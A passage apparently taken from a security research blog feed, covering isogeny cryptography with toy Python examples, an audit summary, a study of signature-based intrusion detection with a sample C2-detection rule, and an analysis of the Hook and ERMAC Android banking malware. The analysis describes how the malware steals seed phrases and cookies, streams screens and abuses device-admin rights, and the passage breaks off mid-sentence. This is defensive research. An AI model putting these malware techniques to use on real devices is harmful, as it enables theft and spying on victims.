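# Toy 2-isogeny via Velu's formulas over a small prime field.
# The prime, curve and point are invented toy values, not real parameters.

p = 11  # toy prime

def on_curve(x, y, a, b):
    """Check y^2 = x^3 + a*x + b over GF(p)."""
    return (y * y - (x * x * x + a * x + b)) % p == 0

def two_isogeny(a, b, x0):
    """Given a 2-torsion point (x0, 0) on y^2 = x^3 + ax + b,
    return the codomain coefficients and the rational map (Velu)."""
    t = (3 * x0 * x0 + a) % p
    w = (x0 * t) % p
    a2 = (a - 5 * t) % p
    b2 = (b - 7 * w) % p

    def phi(x, y):
        inv = pow((x - x0) % p, p - 2, p)   # 1/(x - x0) mod p
        X = (x + t * inv) % p
        Y = (y * (1 - t * inv * inv)) % p
        return X, Y

    return a2, b2, phi

# E: y^2 = x^3 + 4x over GF(11) has the 2-torsion point (0, 0).
a, b, x0 = 4, 0, 0
a2, b2, phi = two_isogeny(a, b, x0)

P = (1, 4)            # a point on E, since 4^2 = 1 + 4 mod 11
assert on_curve(*P, a, b)
Q = phi(*P)           # its image lands on the codomain curve
assert on_curve(*Q, a2, b2)
```

Note how the map is defined purely by rational functions of the coordinates, and how it carries points of the domain curve onto points of a new curve: that is all an isogeny walk step is.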

Isogenies in Higher Dimensions

For the past year, isogeny-based cryptography has undergone a revolution after a series of papers appeared which broke the key exchange protocol SIDH. The practical break of SIDH was particularly spectacular, as it essentially removed the key-encapsulation mechanism SIKE from the NIST post-quantum project, which only weeks before had been chosen by NIST to continue to the fourth round as a prospective alternative candidate to Kyber.

For more information on the break of SIDH, I have a post on the SageMath implementation of the first attack, as well as a summary of the Eurocrypt 2023 conference, where the three attack papers were presented in the best-paper award plenary talks. Thomas Decru, one of the authors of the first attack paper, wrote a fantastic blog post which is a great overview of how the attack works.

The key to all of the attacks was that, given some special data, information about the secret walk between elliptic curves could be recovered by computing an isogeny in “higher dimension”. In fact, the short description of isogenies above was a little too restrictive. For the past ten years, cryptographers have been looking at how to compute isogenies between supersingular elliptic curves. However, over the fence in maths world, a generalisation of this idea is to look at isogenies between principally polarised superspecial abelian varieties. When we talk about these superspecial abelian varieties, a natural way to categorise them is by their “genus”, or “dimension”.

Luckily, for now, we don’t need to worry about arbitrary dimension, as for the current work we really only need dimension two for the attack on SIDH, and for some new proposed schemes, dimensions four and eight, which I won’t discuss much further.

If you want to imagine these higher dimensional varieties, one way is to think about three dimensional surfaces which have some “holes” or “handles”. A dimension one variety is an elliptic curve, which you can imagine as a donut. In dimension two we have two options, the generic object is some surface with two handles (a donut with two holes? Where’s all my donut gone?), but there are also “products of elliptic curves”, which can be seen as two dimensional surfaces which can in some sense be factored into two dimension-one surfaces (or abstractly, as a pair of donuts!).

The core computation of the attack is a two-dimensional isogeny between elliptic products. An isogeny between elliptic products is simply a walk which takes you from one of these pairs of donuts, through many steps of the generic surface, and ends on another special surface which factors into donuts again. A natural question to ask is: how special are these products? When we work in a finite field with characteristic p, we have about p^3 surfaces available and only p^2 of these are elliptic products. In cryptographic contexts, where the characteristic is very large, it’s essentially impossible to accidentally land on one of these products.

With this as background, we can now ask a few natural questions:

  • When can we compute isogenies between elliptic products?
  • Why do we want to compute isogenies between elliptic products?
  • How can we ask computers to compute isogenies between elliptic products?

When we can find these very special isogenies between elliptic products was characterised by Ernst Kani in 1997, and it was this lemma which illuminated the method to attack SIDH. Kani’s criterion describes how, when a set of one-dimensional isogenies has particular properties, and when you additionally know certain information about the points on these curves, a specially chosen two-dimensional isogeny will walk between elliptic products.

This is what Thomas Decru talked about in his presentation, which gave a wonderful overview of why these criteria were enough to successfully break SIDH. The idea is that although some of this information is secret, you can guess small parts of the secret and when you are correct, your two dimensional isogeny splits at the end. Guessing each part of the secret in turn then very quickly recovers the entire secret.
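The guess-and-check structure of the attack can be caricatured with a toy oracle. Here the `splits` function stands in for the (feasible) check “does my two-dimensional isogeny split at the end?”, and the secret is just a random bit string rather than an isogeny path; everything in this sketch is invented for illustration:

```python
import secrets

# Toy model of the guess-and-check structure of the SIDH attacks.
# In the real attack the oracle is an isogeny computation, not a comparison.

SECRET = [secrets.randbelow(2) for _ in range(64)]  # unknown bit string

def splits(prefix_guess):
    """Oracle: True iff the guessed prefix matches the secret."""
    return SECRET[:len(prefix_guess)] == prefix_guess

def recover_secret(n_bits):
    known = []
    for _ in range(n_bits):
        for bit in (0, 1):
            if splits(known + [bit]):
                known.append(bit)
                break
    return known

recovered = recover_secret(len(SECRET))
assert recovered == SECRET
# 64 bits recovered with at most 128 oracle calls, instead of the
# 2^64 attempts a blind exhaustive search would need.
```

Being able to confirm each small piece of the secret independently is what collapses the search from exponential to linear, and it is exactly this piecewise confirmation that the splitting behaviour provides.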

Following the description of the death of SIKE, Tako Boris Fouotsa talked about possible ways to modify the SIDH protocol to revive it. The general idea is to hide parts of the information Kani’s criterion requires, in such a way that an attacker can no longer guess it piece by piece. One method is to take the information you need from the points on curves and mask it by multiplying them by some secret scalar.

Masking these points, which are the torsion data for the curves, was also the topic of two other talks. Guido Lido gave an energetic and enjoyable double-talk on the “level structure” of elliptic curves, which was complemented very nicely by a talk by Luca De Feo the following day which gave another perspective on how modular curves can help us complete the zoology of these torsion structures. Along with this categorisation, Luca gave a preview of a novel attack on one possible variant of SIDH which hides half of the torsion data. If SIDH is to be dragged back into protocols with the strategies discussed by Boris, it’s vital to really understand mathematically what this masking is, highlighting the importance of the work by Guido, Luca and their collaborators.

Although breaking a well-known and long standing cryptographic protocol is more than enough motivation to study these isogenies, the continued research on computing higher dimensional isogenies will be motivated by the introduction of these maps into protocols themselves. This brings us to the why, and this was addressed by Benjamin Wesolowski, who discussed SQIsignHD and Luciano Maino, who discussed FESTA. As SQIsign and related talks will soon have a section of its own, we’ll jump straight to FESTA.

The essence of FESTA is to find a way to configure some one-dimensional isogenies during keygen and encryption such that during decryption, a holder of the secret key can perform the SIDH attack, while no one else can. As the SIDH attack recovers secrets about the one-dimensional isogenies, encryption is then a case of using some message to describe the isogeny path, and as decryption recovers this path it also recovers the secret message. The core of how FESTA works is tied up in the categories of masking that Guido and Luca described. Luciano used his presentation to give an overview of how everything comes together, and how by using commutative masking matrices, encryption masks away certain critical data which can then be unmasked during decryption thanks to the commutativity.
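The role commutativity plays can be illustrated with a deliberately simplified model: instead of masking torsion points on curves, we mask a vector mod N with invertible diagonal matrices, which commute with each other just as FESTA’s masking matrices do. All values here are invented for illustration:

```python
# Toy illustration of commutative masking, loosely in the spirit of
# FESTA's commuting matrix masks. Real FESTA masks torsion points on
# elliptic curves; here we only mask a vector with diagonals mod N.

N = 101  # toy modulus (prime, so every nonzero scalar is invertible)

def diag_mul(d, v):
    """Apply the diagonal matrix diag(d) to the vector v mod N."""
    return [(di * vi) % N for di, vi in zip(d, v)]

def diag_inv(d):
    """Invert a diagonal matrix entry-wise via Fermat's little theorem."""
    return [pow(di, N - 2, N) for di in d]

data = [17, 42]          # stand-in for torsion point data
alice_mask = [5, 9]
bob_mask = [33, 71]

# Masks applied in either order give the same result (they commute)...
m1 = diag_mul(alice_mask, diag_mul(bob_mask, data))
m2 = diag_mul(bob_mask, diag_mul(alice_mask, data))
assert m1 == m2

# ...so Alice can strip her own mask even though Bob masked "on top".
partially_unmasked = diag_mul(diag_inv(alice_mask), m1)
assert partially_unmasked == diag_mul(bob_mask, data)
```

The point of the sketch is only the algebra: because the masks commute, the secret-key holder can peel off their own layer regardless of the order in which the masks were applied.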

The idea of using SIDH attacks to build a quantum-safe public key encryption protocol is not new: a very similar protocol was described in SETA. However, due to the inefficiency of the SIDH attacks at the time, the protocol itself did not have practical running times. The key to what makes FESTA efficient is precisely the new polynomial-time algorithms for the attack.

To close out the third session of the isogeny mini-symposium, I then did my best to talk about the how. Given that these isogenies can be used constructively to build quantum-safe protocols, can we find ways to strip back the complications in existing implementations and get something efficient and simple enough to be suitable for cryptographic protocols? The talk was split between the three categories of isogenies we need:

  • The first step is understanding how to compute the “gluing isogeny”, between a product of elliptic curves and the resulting dimension-two surface.
  • The last step is understanding how to efficiently compute the “splitting isogeny” from a two-dimensional surface to a pair of elliptic curves.
  • All other steps are then isogenies between these generic two-dimensional surfaces. These are described by Richelot correspondences, which date back to the 19th century and are surprisingly simple considering the work they do.

I described some new results which allow for particularly efficient gluing isogenies, and showed that by working algebraically, a closed form of the splitting isogeny can be recovered, saving about 90% of the work of the usual methods. For the middle steps, there’s still much work to be done, and I hope as a community we can continue optimising these isogenies.

In summary, the SIDH attacks have introduced a whole new toolbox of isogenies, and it’s exciting to see these being used constructively and optimised for real-world usage. The cryptanalysis of isogeny-based protocols is of course undergoing its own revolution, and understanding how higher dimensional structures can make or break new schemes is vibrant and exciting work.

An Isogeny Walk back to NIST

Back in dimension one, an isogeny-based digital signature algorithm has been submitted to NIST’s recent call for protocols. Of the 40 candidates which appeared when round one came online, only one is isogeny-based. SQIsign is an extremely compact, but relatively new and slow, protocol which was introduced in 2020 and was followed up with a paper with various performance enhancements in 2022.

Underlying SQIsign is a fairly simple idea. The signer computes a secret isogeny path between two elliptic curves. The starting curve, which is public and known to everyone, has special properties. The signer publishes their ending curve as a public key, but as only they know the isogeny between the curves, only the signer knows the special properties of the ending curve. A signature is computed from a high-soundness sigma protocol, which essentially boils down to asking the signer to compute something which they could only compute if they knew this secret isogeny.

Concretely, SQIsign is built on the knowledge of the endomorphism ring of an elliptic curve, which is the set of isogenies from a curve to itself. The starting curve is chosen so everyone knows its endomorphism ring. The trick in SQIsign is that although it generally seems hard to compute the endomorphism ring of a random supersingular curve, if you know an isogeny between two curves and the endomorphism ring of one of them, you can efficiently compute the endomorphism ring of the other. This means that the secret isogeny allows the signer to “transport” the endomorphism ring from the starting curve to their public curve, and so the endomorphism ring of this end curve is secret to everyone except the signer.

Algorithms become efficient thanks to the Deuring correspondence, which takes information from an elliptic curve and represents it using a quaternion algebra. In quaternion world, certain problems become easy which are hard on elliptic curves, and once the right information is recovered, the Deuring correspondence maps this all back to elliptic curve world so the protocol can continue. Ultimately all of the above boils down to “things are computationally easy if you know the endomorphism ring”. Because of this, a signer can compute things from the public curve which nobody else can feasibly compute.

There’s a lot of buzzwords in the above, and unpicking exactly how SQIsign works is challenging. For the interested reader, I recommend the above papers, along with Antonin Leroux’s thesis. For those who like to learn along with the implementation, I worked with some collaborators to write a verbose implementation following the first SQIsign paper in SageMath. We wrote a blog post discussing the implementation challenges, Learning to SQI, and the code is on GitHub.

The selling point of SQIsign is its compact representation. For NIST level I security (128-bit), a public key requires only 64 bytes and a signature only 177 bytes. Compare this to Dilithium, a lattice based scheme chosen at the end of round three, which at the same security level has public keys with 1312 bytes and signatures of 2420 bytes! However, the main drawback is that it is orders of magnitude slower than Dilithium, and the complex, heuristic algorithms of some of the quaternion algebra pieces mean that writing a safe and side-channel resistant implementation is extremely challenging.

At SIAM, progress in closing the efficiency gap was the subject of several talks, and optimisations are being found in a variety of ways. Lorenz Panny discussed the Deuring correspondence in a more general setting, where he showed that with some clever algorithmic tricks, isogenies could be computed in reasonable time by using extension fields to gather enough data for the Deuring correspondence to be feasible, even for inefficient parameter sets.

On the flip side of this, Michael Meyer discussed recent advances in parameter searching for SQIsign, which make the work that Lorenz described particularly efficient. One of the main bottlenecks in SQIsign is in computing large prime degree isogenies, which occurs because SQIsign requires both p+1 and p-1 to have many small factors, and for large p it’s tough to ensure all these factors stay as small as possible. Michael discussed several different tricks which can be used to find twin smooth numbers, and how different techniques are beneficial depending on the bit-length of p. The upshot is that the culmination of all these ideas has allowed the SQIsign team to find valid parameter sets targeting all three NIST security levels.
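The shape of the search Michael described can be sketched with a brute-force hunt for small “twin smooth” integers: if n and n+1 are both smooth and p = 2n + 1 is prime, then p - 1 = 2n and p + 1 = 2(n + 1) factor into small primes. Real parameter searches use vastly larger bounds and far cleverer techniques; this is only a toy to show the shape of the problem:

```python
# Toy search for "twin smooth" integers: n and n+1 both B-smooth.
# If p = 2n + 1 is also prime, then p - 1 and p + 1 are both smooth,
# which is the shape of characteristic SQIsign parameters need.

def is_smooth(n, B):
    """True iff every prime factor of n is at most B (trial division)."""
    for q in range(2, B + 1):
        while n % q == 0:
            n //= q
    return n == 1

def is_prime(n):
    if n < 2:
        return False
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False
        d += 1
    return True

B = 7
hits = [n for n in range(2, 5000)
        if is_smooth(n, B) and is_smooth(n + 1, B) and is_prime(2 * n + 1)]
print(hits[:5])  # → [2, 3, 5, 6, 8]
```

Even in this toy range the hits thin out quickly as n grows, which hints at why finding cryptographically sized twin smooths is such hard work.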

Antonin Leroux talked more specifically about the Deuring correspondence as used in the context of SQIsign and focused on the improvements between the 2020 and 2022 SQIsign papers. The takeaway was that several improvements have resulted in performance enhancements to allow up to NIST-V parameter sets, but the protocol was a long way off competing with the lattice protocols which had already been picked. Optimistically, we can always work hard to find faster ways to do mathematics, and the compact keys and signatures of SQIsign make it extremely attractive for certain use cases.

To finish the summary, we can come back to Benjamin Wesolowski’s talk, which described recent research that adopts the progress in higher dimensions and modifies the SQIsign protocol, removing many heuristic and complicated steps during keygen and signing and shifting the protocol’s complexity into verification.

The main selling point of SQIsignHD is that it is not only simpler to implement in many ways, but the security proofs become much more straightforward, which should go a long way to show that the protocol is robust. However, unlike the original SQIsign, SQIsignHD verification requires the computation of a four-dimensional isogeny. These isogenies are theoretically described, but a full implementation of them is still a work in progress. Understanding precisely how the verification time is affected is key to understanding whether the HD-remake of SQIsign could either replace or exist alongside the original design.

Acknowledgements

Many thanks to Aleksander Kircanski for reading an earlier draft of this blog post, and to all the people I worked with during the week in Eindhoven.

Public Report – Entropy/Rust Cryptography Review

30 August 2023 at 16:00

During the summer of 2023, Entropy Cryptography Inc engaged NCC Group’s Cryptography Services team to perform a cryptography and implementation review of several Rust-based libraries implementing constant-time big integer arithmetic, prime generation, and secp256k1 (k256) elliptic curve functionality. Two consultants performed the review within 40 person-days of effort, which included retesting and report generation.

The three primary code repositories in scope for this review were:

  1. github.com/RustCrypto/crypto-bigint
  2. github.com/entropyxyz/crypto-primes
  3. github.com/RustCrypto/elliptic-curves/k256

The review identified a range of issues that were addressed promptly once reported, with the proposed fixes aligning with the recommendations made in the report below.

HITB Phuket 2023 – Exploiting the Lexmark PostScript Stack

31 August 2023 at 09:23

Aaron Adams presented this talk at HITB Phuket on the 24th August 2023. The talk detailed how NCC Group’s Exploit Development Group (EDG) was able to exploit two different PostScript vulnerabilities in Lexmark printers at Pwn2Own Toronto 2022. The presentation is a good primer for those interested in further researching the Lexmark PostScript stack, and also for those interested in how PostScript interpreter exploitation can be approached in general.

The slides for the talk can be downloaded here.

Ruling the rules

8 September 2023 at 14:55

Mathew Vermeer is a doctoral candidate at the Organisation & Governance department of the faculty of Technology, Policy and Management of Delft University of Technology. At the same university, he has received both a BSc degree in Computer Science and Engineering and an MSc degree in Computer Science with a specialization in cyber security. His master’s thesis examined (machine learning-based) network intrusion detection systems (NIDSs), their effectiveness in practice, and methods for their proper evaluation in real-world settings. In 2019 he joined the university as a PhD researcher. Mathew’s current research similarly includes NIDS performance and management processes within organizations, as well as external network asset discovery and security incident prediction.

Introduction

The following is a short summary of a study conducted as part of my PhD research at TU Delft in collaboration with Fox-IT. We’re interested in studying the different processes and technologies that determine or impact the security posture of organizations. In this case, we set out to better understand the signature-based network intrusion detection system (NIDS). Ubiquitous within the field of network security, it’s been part of the bedrock of network security for over two decades, and industry reports have been predicting its demise for almost just as long [1].

Both industry and academia [2, 3] seem to be pushing for a gradual phasing out of the supposedly “less-capable” [2] signature-based NIDS in favour of machine-learning (ML) methods. The former uses sets of signatures (or rules) that inform the NIDS what to look for in network traffic and flag as potentially malicious, while the latter uses statistical techniques to find potentially malicious anomalies within network traffic. The underlying motivation is that conventional rule- and signature-based methods are deemed unable to keep up with fast-evolving threats and will, therefore, become increasingly obsolete. While some argue for complementary use, others imply outright replacement to be a more effective solution, comparing their own ML system with an improperly configured (i.e., enabling every single rule from the Emerging Threats community ruleset) signature-based NIDS to try to drive home the point [4]. On the other hand, walk into any security operations center (SOC) and what you’ll see is analysts triaging alerts generated by NIDSs that still rely heavily on rulesets.

So how much of this push is simply hype, and how much is backed up by actual data? Do traditional signature-based NIDSs truly no longer add to an organization’s security?
To answer this, we analyzed alert and incident data from Fox-IT, and the many proprietary and commercial rulesets employed at Fox-IT spanning from mid-2009 to mid-2018. We used this data to examine how Fox-IT manages its own signature-based NIDS to provide security for its clients. The most interesting results are described below.

NIDS environment

First, it’s helpful to get acquainted with the environment in place at Fox-IT. The figure below roughly illustrates the NIDS pipeline in use at Fox-IT, starting from the NIDS rules on the left to the incidents all the way on the right. Rules are either purchased from a threat intel vendor or created in-house. Of note is that in-house rules are usually tested for a period of time, during which they are tweaked until their performance is deemed acceptable; this period can vary depending on the novelty, severity, etc., of the threat the rule is trying to detect. Once that condition is reached, the rules are added to the production environment, where they can again be modified based on their performance in a real-world environment.
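To make the notion of a “rule” concrete, the snippet below shows the general shape of a Suricata-style signature. The domain, message and sid are invented for illustration and are not taken from any Fox-IT or commercial ruleset:

```
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"EXAMPLE Possible beaconing to known C2 domain"; http.host; content:"evil-example.test"; classtype:trojan-activity; sid:9000001; rev:1;)
```

When traffic matches the rule’s conditions, the sensor raises an alert carrying the rule’s metadata, and those alerts are what the SOC analysts downstream end up triaging.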

Modelling the workflows in this way allows us to find relationships between alerts, incidents, and rules, as well as the effects that security events have on the manner in which rules are managed.

Custom ruleset important for proper functioning of NIDS

One of the go-to metrics for measuring the effectiveness of security systems is their precision [5]. This is because, as opposed to simple accuracy, precision penalizes false positives. Since false positive detections are something rule developers and SOC analysts strive to minimize, it stands to reason that such occurrences are taken into account when measuring the performance of an NIDS.

We found that the custom ruleset Fox-IT creates in-house is critical for the proper functioning of its NIDS. The precision of Fox-IT’s proprietary ruleset is higher than that of the commercial sets employed: an average of 0.74, in contrast to 0.68 and 0.65 for the two commercial rulesets, respectively. Important to note here is that the commercial sets achieve such precision scores only because of extensive tuning by the Fox-IT team before the rules are introduced into the sensors. Had this not occurred, their measured precision would be much lower (in case the sensors had not burst into flames beforehand).

The Fox-IT ruleset is also much smaller than the commercial rulesets: around 2,000 rules versus tens of thousands of commercial rules from ET and Talos. Nevertheless, the rules within Fox-IT’s own ruleset are present in 27% of all true positive incidents. This is surprising, given the massive difference in ruleset size (2,000 Fox-IT rules vs. 50,000+ commercial rules) and, therefore, threat coverage. Both findings clearly demonstrate the higher utility of Fox-IT’s proprietary rules. Still, they clearly play a complementary role to the commercial rules, which is something we explore in a different study.
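As a reminder of the metric, precision is the fraction of raised alerts that turn out to be true positives. A minimal sketch with made-up counts (the study reports only the resulting scores, not the raw alert counts behind them):

```python
# Precision = TP / (TP + FP): of everything flagged as malicious,
# how much really was? The counts below are invented for illustration.

def precision(true_positives, false_positives):
    return true_positives / (true_positives + false_positives)

# e.g. a ruleset whose alerts yield 740 true and 260 false positives
# scores a precision of 0.74:
print(precision(740, 260))  # → 0.74
```

Unlike accuracy, this number cannot be inflated by the overwhelming volume of benign traffic a sensor correctly ignores, which is why it is the natural yardstick for ruleset quality.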

Newest rules produce most incidents

The figure below shows the average age of rules plotted against the number of incidents that a rule of that age will trigger on average per week. For instance, the spike on the left represents rules that are a week old. Such a week-old rule would, on average, produce around four incidents per week. This means that it’s the newest rules that produce the most incidents.

The implications of this are twofold. Firstly, it emphasizes the importance of staying up to date with the global threat landscape. It is insufficient to rely on rules and rulesets that perfectly protected your organization once upon a time. SOC teams need to continuously scour for new threats and perform their own research to keep their organization and their clients secure. Secondly, rules seem to lose their relevance and effectiveness as time goes by. Probably obvious, yes, but it hints at the possibility of another type of NIDS optimization: performance. While disabling any and all rules that pass a certain age threshold might not be the wisest of decisions, SOC teams can examine old rules to determine which ones produce results that are less than satisfactory. Such rules can then potentially be disabled, depending, of course, on the type of rule, the severity of the threat it is designed to detect, its precision (or any other metric), etc.

99.8% of (detected) true positive incidents caught before becoming successful attacks

Finally, the image below is a visual representation of all the alerts we analyzed, and how they are condensed into incidents, true positive incidents, and successful attacks. For the nine years of data made available for this analysis, we counted 62 million alerts that our SOC analysts processed. They were able to condense these 62 million alerts into 150,000 incidents, which were in turn condensed into 69,000 true positive incidents. And finally, out of the 69,000, only 106 incidents turned out to be successful attacks. With some quick math we can deduce that 99.8% of all true positive incidents detected by the SOC were discovered before they were able to cause any serious damage to the organizations the SOC aims to protect on a daily basis.

I’ll point out, though, that this number ignores the potential false negatives that were able to evade detection. This is, naturally, a number that we can’t easily measure accurately. However, we’re certain it doesn’t run high enough to significantly alter the result, and so we’re confident in the accuracy of the computed percentage.
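The headline percentage follows directly from the counts in the funnel; a quick sanity check:

```python
# Of the 69,000 true positive incidents, only 106 became successful
# attacks, so the SOC caught the remainder before damage was done.

true_positive_incidents = 69_000
successful_attacks = 106

caught_in_time = 1 - successful_attacks / true_positive_incidents
print(f"{caught_in_time:.1%}")  # → 99.8%
```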

Conclusion

So, with all of these results, we demonstrate that signature-based systems are still effective, given that they are managed properly, for example by keeping them up to date with the newest threat intelligence. Of course, future work is still needed to compare the signature-based approach to other types of intrusion detection, whether network-based, host-based or application-based. Only once that comparison is done will we be able to determine whether these signature-based systems really do need to be phased out as archaic and obsolete pieces of technology, or if they remain an indispensable part of our network security. As it currently stands, however, the fact that they continue to provide value and security to the organizations that use them is indisputable.

This was a quick overview of a few findings from our study. If you’re curious for more, you’re welcome to take a look at the full paper (https://dl.acm.org/doi/abs/10.1145/3488932.3517412).

References

[1] http://web.archive.org/web/20201209162847/https://bricata.com/blog/ids-is-dead/

[2] Shone, N., Ngoc, T.N., Phai, V.D. and Shi, Q., 2018. A deep learning approach to network intrusion detection. IEEE transactions on emerging topics in computational intelligence, 2(1), pp.41-50.

[3] Vigna, G., 2010, December. Network intrusion detection: dead or alive?. In Proceedings of the 26th Annual Computer Security Applications Conference (pp. 117-126).

[4] Mirsky, Y., Doitshman, T., Elovici, Y. and Shabtai, A., 2018. Kitsune: an ensemble of autoencoders for online network intrusion detection. arXiv preprint arXiv:1802.09089.

[5] He, H. and Garcia, E.A., 2009. Learning from imbalanced data. IEEE Transactions on knowledge and data engineering, 21(9), pp.1263-1284.

From ERMAC to Hook: Investigating the technical differences between two Android malware variants

11 September 2023 at 09:03

Authored by Joshua Kamp (main author) and Alberto Segura.

Summary

Hook and ERMAC are Android-based malware families that are both advertised by the actor named “DukeEugene”. Hook is the latest variant to be released by this actor and was first announced at the start of 2023. In this announcement, the actor claims that Hook was written from scratch [1]. In our research, we have analysed two samples of Hook and two samples of ERMAC to further examine the technical differences between these malware families.

After our investigation, we concluded that the ERMAC source code was used as a base for Hook. All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical. The main features in ERMAC are related to sending SMS messages, displaying a phishing window on top of a legitimate app, extracting a list of installed applications, SMS messages and accounts, and automated stealing of recovery seed phrases for multiple cryptocurrency wallets.

Hook has introduced a lot of new features, with a total of 38 additional commands when comparing the latest version of Hook to ERMAC. The most interesting new features in Hook are: streaming the victim’s screen and interacting with the interface to gain complete control over an infected device, the ability to take a photo of the victim using their front facing camera, stealing of cookies related to Google login sessions, and the added support for stealing recovery seeds from additional cryptocurrency wallets.

Hook had a relatively short run. It was first announced on the 12th of January 2023, and the closing of the project was announced on April 19th, 2023, due to “leaving for special military operation”. On May 11th, 2023, the actors claimed that the source code of Hook was sold at a price of $70,000. If these announcements are true, it could mean that we will see interesting new versions of Hook in the future.

The launch of Hook

On the 12th of January 2023, DukeEugene started advertising a new Android botnet to be available for rent: Hook.

Forum post where DukeEugene first advertised Hook.

Hook malware is designed to steal personal information from its infected users. It contains features such as keylogging, injections/overlay attacks to display phishing windows over (banking) apps (more on this in the “Overlay attacks” section of this blog), and automated stealing of cryptocurrency recovery seeds.

Financial gain seems to be the main motivator for operators that rent Hook, but the malware can be used to spy on its victims as well. Hook is rented out at a cost of $7,000 per month.

Forum post showing the rental price of Hook, along with the claim that it was written from scratch.

The malware was advertised with a wide range of functionality in both the control panel and build itself, and a snippet of this can be seen in the screenshot below.

Some of Hook’s features that were advertised by DukeEugene.

Command comparison

Analyst’s note: The package names and file hashes that were analysed for this research can be found in the “Analysed samples” section at the end of this blog post.

While checking out the differences in these malware families, we compared the C2 commands (instructions that are sent by the malware operator to the infected device) in each sample. This analysis led us to find several new commands and features in Hook, as can be seen just by looking at the number of commands implemented in each variant.

Sample | Number of commands
Hook sample #1 | 58
Hook sample #2 | 68
ERMAC sample #1 & #2 | 30

All 30 commands that exist in ERMAC also exist in Hook. Most of these commands are related to sending SMS messages, updating and starting injections, extracting a list of installed applications, SMS messages and accounts, and starting another app on the victim’s device (where cryptocurrency wallet apps are the main target). While simply launching another app may not seem that malicious at first, you will think differently after learning about the automated features in these malware families.

Automated features in the Hook C2 panel.

Both Hook and ERMAC contain automated functionality for stealing recovery seeds from cryptocurrency wallets. These can be used to gain access to the victim’s cryptocurrency. We will dive deeper into this feature later in the blog.

When comparing Hook to ERMAC, 29 new commands have been added to the first sample of Hook that we analysed, and the latest version of Hook contains 9 additional commands on top of that. Most of the commands that were added in Hook are related to interacting with the user interface (UI).

Hook command: start_vnc

The UI interaction related commands (such as “clickat” to click on a specific UI element and “longpress” to dispatch a long press gesture) in Hook go hand in hand with the new “start_vnc” command, which starts streaming the victim’s screen.

A decompiled method that is called after the “start_vnc” command is received by the bot.

In the code snippet above we can see that the createScreenCaptureIntent() method is called on the MediaProjectionManager, which is necessary to start screen capture on the device. Along with the many commands to interact with the UI, this allows the malware operator to gain complete control over an infected device and perform actions on the victim’s behalf.


Controls for the malware operator related to the “start_vnc” command.

Command implementation

For the commands that are available in both ERMAC and Hook, the code implementation is nearly identical. Take the “logaccounts” command for example:

Decompiled code that is related to the “logaccounts” command in ERMAC and Hook.

This command is used to obtain a list of available accounts by their name and type on the victim’s device. When comparing the code, it’s clear that the logging messages are the main difference. This is the case for all commands that are present in both ERMAC and Hook.

Russian commands

Both ERMAC and the Hook v1 sample that we analysed contain some rather edgy commands in Russian, that do not provide any useful functionality.

Decompiled code which contains Russian text in ERMAC and first versions of Hook.

The command above translates to “Die_he_who_reversed_this“.

All the Russian commands create a file named “system.apk” in the “apk” directory and immediately delete it. It appears that the authors have recently shifted towards running a more reputable business, as these commands were removed in the latest Hook sample that we analysed.

New commands in Hook V2

In the latest versions of Hook, the authors have added 9 additional commands compared to the first Hook sample that we analysed. These commands are:

Command | Description
send_sms_many | Sends an SMS message to multiple phone numbers
addwaitview | Displays a “wait / loading” view with a progress bar, custom background colour, text colour, and text to be displayed
removewaitview | Removes the “wait / loading” view that is displayed on the victim’s device because of the “addwaitview” command
addview | Adds a new view with a black background that covers the entire screen
removeview | Removes the view with the black background that was added by the “addview” command
cookie | Steals session cookies (targets victim’s Google account)
safepal | Starts the Safepal Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
exodus | Starts the Exodus Wallet application (and steals seed phrases as a result of starting this application, as observed during analysis of the accessibility service)
takephoto | Takes a photo of the victim using the front facing camera

One of the already existing commands, “onkeyevent”, also received a new payload option: “double_tap”. As the name suggests, this performs a double tap gesture on the victim’s screen, providing the malware operator with extra functionality to interact with the victim’s device user interface.

More interesting additions are: the support for stealing recovery seed phrases from other crypto wallets (Safepal and Exodus), taking a photo of the victim, and stealing session cookies. Session cookie stealing appears to be a popular trend in Android malware, as we have observed this feature being added to multiple malware families. This is an attractive feature, as it allows the actor to gain access to user accounts without needing the actual login credentials.

Device Admin abuse

Besides adding new commands, the authors have added more functionality related to the “Device Administration API” in the latest version of Hook. This API was developed to support enterprise apps in Android. When an app has device admin privileges, it gains additional capabilities meant for managing the device. This includes the ability to enforce password policies, locking the screen and even wiping the device remotely. As you may expect: abuse of these privileges is often seen in Android malware.

DeviceAdminReceiver and policies

To implement custom device admin functionality, an app defines a class that extends “DeviceAdminReceiver”. This class can be found by examining the app’s Manifest file and searching for the receiver with the “BIND_DEVICE_ADMIN” permission or the “DEVICE_ADMIN_ENABLED” action.

Defined device admin receiver in the Manifest file of Hook 2.

In the screenshot above, you can see an XML file declared as follows: android:resource="@xml/buyanigetili". This file contains the device admin policies that can be used by the app. Here’s a comparison of the device admin policies in ERMAC, Hook 1, and Hook 2:

Differences between device admin policies in ERMAC and Hook.

Comparing Hook to ERMAC, the authors have removed the “WIPE_DATA” policy and added the “RESET_PASSWORD” policy in the first version of Hook. In the latest version of Hook, the “DISABLE_KEYGUARD_FEATURES” and “WATCH_LOGIN” policies were added. Below you’ll find a description of each policy that is seen in the screenshot.

Device Admin Policy | Description
USES_POLICY_FORCE_LOCK | The app can lock the device
USES_POLICY_WIPE_DATA | The app can factory reset the device
USES_POLICY_RESET_PASSWORD | The app can reset the device’s password/pin code
USES_POLICY_DISABLE_KEYGUARD_FEATURES | The app can disable use of keyguard (lock screen) features, such as the fingerprint scanner
USES_POLICY_WATCH_LOGIN | The app can watch login attempts from the user
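For reference, the policy resource referenced from the manifest is a small XML file in the app’s res/xml directory. The sketch below is an assumed reconstruction of what Hook 2’s file would contain, using the standard Android element names for the four policies listed above (the resource name “buyanigetili” comes from the manifest screenshot):

```xml
<!-- res/xml/buyanigetili.xml: hypothetical reconstruction of Hook 2's policy file -->
<device-admin xmlns:android="http://schemas.android.com/apk/res/android">
    <uses-policies>
        <force-lock />
        <reset-password />
        <disable-keyguard-features />
        <watch-login />
    </uses-policies>
</device-admin>
```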

The “DeviceAdminReceiver” class in Android contains methods that can be overridden. This is done to customise the behaviour of a device admin receiver. For example: the “onPasswordFailed” method in the DeviceAdminReceiver is called when an incorrect password is entered on the device. This method can be overridden to perform specific actions when a failed login attempt occurs. In ERMAC and Hook 1, the class that extends the DeviceAdminReceiver only overrides the onReceive() method and the implementation is minimal:

